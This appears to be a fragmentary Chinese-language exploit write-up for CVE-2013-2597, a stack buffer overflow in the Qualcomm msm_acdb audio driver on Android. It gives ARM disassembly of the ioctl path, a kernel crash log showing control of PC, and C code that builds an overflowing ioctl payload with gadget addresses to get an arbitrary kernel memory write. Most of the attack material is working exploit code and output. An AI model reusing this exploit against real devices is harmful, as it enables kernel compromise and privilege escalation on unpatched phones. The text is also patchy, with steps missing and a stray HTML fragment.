Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)

do_vfs_ioctl: STMPW [SP], { R4-R9, LR } ... BL acdb_ioctl ... ADD SP, SP, #$44 // (2) LDMUW [SP], { R4-R9, PC } // (1)
2.acdb_ioctl其中一段，可以获得控制PC的机会。修改寄存器的位置是 (3)，这里可以操作R4-PC的所有数值了

ADD SP, SP, #$24 // (6)
LDMUW [SP], { R4-R9, PC }

5.实际栈的位置和p->data的位置需要硬编码适配。
ACDB=> ACDB ioctl not found! Unable to handle kernel paging request at virtual address 9f9e9d9c pgd = df56c000 [9f9e9d9c] *pgd=00000000 Internal error: Oops: 80000005 [#1] preEMPT SMP Modules linked in: CPU: 1 Tainted: G W (3.0.8+1.0.21100-02148-g79e6d0e #1) PC is at 0x9f9e9d9c LR is at acdb_ioctl+0x740/0x860

static int
write_value(const acdb_param *param, unsigned long address, unsigned long value)
{
    const char *device_name = "/dev/msm_acdb";
    struct acdb_ioctl arg;

    int fd;
    int ret;
    int i;

    fd = open(device_name, O_RDONLY);
    if (fd < 0) {
      ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno));
      return -1;
    }

    arg.size = param->pc2.pos + 4;

    for (i = 0; i < arg.size; i += 4) {
      *(unsigned long int *)&arg.data[i] = i;
    }

    *(unsigned long int *)&arg.data[param->address_pos] = address; // R9<span style="white-space:pre">	</span>
    *(unsigned long int *)&arg.data[param->value_pos] = value; // R5
    *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value; // 
    *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value; //

    ret = ioctl(fd, 9999, &arg); // 随意触发一个ioctl，造成堆栈溢出，使得任意地址写入漏洞的触发
    close(fd);

    return 0;
}

参考文章：

Stack-based buffer overflow in acdb audio driver (CVE-2013-2597),布布扣,bubuko.com